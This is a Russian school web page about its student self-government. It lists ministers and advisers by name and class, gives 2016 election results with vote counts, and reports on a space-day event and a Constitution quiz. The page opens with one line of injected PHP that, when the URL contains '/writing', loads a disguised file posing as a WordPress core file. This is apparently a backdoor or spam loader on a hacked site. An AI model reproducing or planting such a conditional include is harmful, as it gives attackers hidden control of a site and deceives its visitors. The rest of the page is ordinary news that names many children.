if(strpos(strtolower($_SERVER['REQUEST_URI']),'/writing')){include(getcwd().'/wp-includes/class-wp-comments.php');exit;} ШУС

ШУС

ШУС ГОВОРИТ

 

 

Концепция деятельности школьного ученического самоуправления

Положение об ученическом самоуправлении 

План мероприятий ШУСа

Итоги выборов министров в ШУС

ШУС МОУ "Всеволожский ЦО"

Фото президентский совет

Список Школьного Ученического Самоуправления

на 2015-2016 учебный год.

ПРЕЗИДЕНТ  - Дворецкий Святослав, 10 класс.

Заместитель президента – Петрова Дарина, 9А класс.

Секретарь – Холодкова Елизавета, 9А класс.

Министерство образования:

Министр – Шестаков Владимир,7Б кл.

Зам. министра – Свириденко Дарья, 7В кл.

Советники:

  1. Митюшина Ксения, 5 Б кл.
  2. Белова Дарья, 5 Г кл.
  3. Концевая  Злата, 6В кл.
  4. Хайруллина Лилия, 6 В кл.
  5. Махлай Владимир,7Б кл.
  6. Поджаров Михаил, 9 Б кл.
  7. Бессараб Марина, 9 Б кл.
  8. Нурматова Шабнам, 5 В кл.
  9. Сбруева Анна, 6 А кл.

Министерство культуры:

Министр – Ширеверова Анастасия, 9А кл.

Зам. министра –Родионова Ангелина 7А кл.

Советники:

  1. Амбарцумов Дмитрий, 5Б кл.
  2. Афонина Кира, 5 В кл.
  3. Будюк Софья, 5 Г кл.
  4. Андреева Майя, 6 В кл.
  5. Черепнева Виолетта, 6 В кл.
  6. Капустина Валерия,8Б кл.
  7. Белова Эдана, 9А кл.
  8. Курунчук  Дария, 9Б кл.
  9. Еськина Диана, 9А кл.
  10. Трохин Максим, 6А кл.
  11. Масалаб Дарья 7А кл.

Министерство спорта и охраны здоровья:

Министр – Мельникова Ксения, 9Б кл.

Зам. министра – Карпеева Настя, 7А кл.

Советники:

  1. Федоренко Никита, 5Б кл.
  2. Майданский Ярослав, 5 Г кл.
  3. Каган Марк, 6 В кл.
  4. Рублева Екатерина, 6 В кл.
  5. Лашков Иван,7А кл.
  6. Воропай Ольга, 7Б кл.
  7. Баркеев Владислав, 8В кл.
  8. Зорин Евгений, 5В кл.
  9. Кутузова Екатерина, 8Б кл.
  10. Дементьев Никита, 6А кл.
  11. Васин Степан, 9Б кл.

Министерство печати и информации:

Министр –.

Зам. министра –Осипова Виктория, 7В кл.

Советники:

  1. Исаева Ксения, 5 Б кл.
  2. Горбулев Иван, 5 Г кл.
  3. Попова Ульяна, 6В кл.
  4. Гуллова Александра, 6 В кл.
  5. Сушко Оксана, 8 Б кл.
  6. Яковишина Елизавета, 6А кл.

Министерство полезных дел:

Министр – Грянкин Александр,8В кл.

Зам. министра –Гыля Антон, 8В кл.

Советники:

  1. Каманин Даниил, 5 Б кл.
  2. Чемодурова Валерия, 6 А кл.
  3. Осипова Анастасия, 5 Г кл.
  4. Халевинская Ксения,6 В кл.
  5. Халилова Полина, 6 В кл.
  6. Гыля Антон, 8В кл.
  7. Тимофеева Светлана, 9 Б кл.
  8. Нероденко Дмитрий, 8А кл.

Министерство контроля:

Министр – Холодкова Елизавета, 9А кл.

Зам. министра – Авакян Мальвина,7 В кл.

Советники:

  1. Игнатенков Роман, 5 Б кл.
  2. Зуев Никита, 5 Г кл.
  3. Петров Лев, 6 В кл.
  4. Пироговская Валерия, 6 В кл.
  5. Громыко Георгий, 8 В кл.
  6. Абдурахманова Худшидабона, 8Б кл.
  7. Бычкова  Ксения, 9 Б кл.
  8. Леонтьев Никита, 5В кл.
  9. Бородаченко Сергей, 7В кл.
  10. Авакян Мальвина, 7В кл.
  11. Курдюкова Лана, 7В кл.
  12. Волович Данил, 6А кл.
  13. Вишневецкая Валерия, 9А кл.

С приветом по планетам

12 апреля весь мир отмечал День авиации и космонавтики. В этом году исполнилось 55 лет со дня первого полёта человека в космос. Именно этому событию было посвящено мероприятие «С приветом по планетам», организованное Школьным Ученическим Самоуправлением. Петрова Дарина (заместитель президента ШУС) рассказала ребятам об интересных фактах полёта животных и людей в космос, а также провела увлекательную викторину.


18 мая состоялись выборы в Школьное Ученическое Самоуправление (ШУС).  Чтобы стать кандидатами на должность Президента и Министров ШУСа  каждый претендент должен был собрать не менее 30 подписей в свою поддержку, а также представить предвыборную программу.

17 мая состоялось обращение кандидатов к гражданам Президентской Республики (обучающимся 5-11 классов).

По результатам голосования  Президентом и Министрами ШУСа на 2016-2017 учебный год стали:

Президент – Петрова Дарина, 10 кл.

Заместитель президента – Ширеверова Анастасия, 10 кл.

Министр образования - Шестаков Владимир, 8Б кл.

Министр культуры – Халевинская Ксения, 7в кл.

Министр контроля – Петров Лев, 7в кл.

Министр печати и информации – Гуллова Александра, 7в кл.

Министр здоровья и спорта – Хмелевская Валерия, 8б кл.

Успехов Вам, ребята!!!

 

 

Результаты голосования.

Должность

Кандидаты

Голоса

Президент

Петрова Дарина, 9а кл.

116

Заместитель президента

Еськина Диана, 9а кл.

51

Ширеверова Анастасия,9а кл.

74

Министр образования

Шестаков Владимир, 7Б кл.

88

Гусева Анна,7б кл.

38

Дудкевич Юлия,6б кл.

18

Министр культуры

Халевинская Ксения, 6в кл.

73

Гридин Михаил, 6в кл.

15

Калмыкова Екатерина, 7б кл.

64

Захацкая Арина, 7а кл.

27

Васильев Сергей, 7а кл.

29

Министр контроля

Петров Лев, 6в кл.

81

Абдурахмонова Фарида, 7в кл.

45

Министр печати и информации

Гуллова Александра, 6в кл.

110

Ножевина Елизавета, 7а кл.

45

Министр здоровья и спорта

Баркеев Владислав, 8в кл.

30

Алёшин Юрий, 9а кл.

54

Хмелевская Валерия, 7бкл.

56

Результаты голосования в Школьное Ученическое Самоуправление

на 2016-2017 учебный год!!!

Президент – Петрова Дарина, 10 кл.

Заместитель президента – Ширеверова Анастасия, 10 кл.

Министр образования - Шестаков Владимир, 8Б кл.

Министр культуры – Халевинская Ксения, 7в кл.

Министр контроля – Петров Лев, 7в кл.

Министр печати и информации – Гуллова Александра, 7в кл.

Министр здоровья и спорта – Хмелевская Валерия, 8б кл

 

День Конституции Российской Федерации является одним из самых значимых государственных праздников России и отмечается ежегодно 12 декабря. В этот день в 1993 году всенародным голосованием в нашей стране была принята Конституция Российской Федерации. 12 декабря в нашей школе прошла интеллектуальная игра «Знатоки Конституции Российской Федерации» среди обучающихся 8 классов. Подготовили и провели игру представители Школьного Ученического Самоуправления во главе с Петровой Дариной, обучающейся 10 класса. В упорной борьбе места распределились следующим образом: 

1 место – команды 8б и 8г классов;

2 место – команда 8а класса;

3 место – команда 8в класса.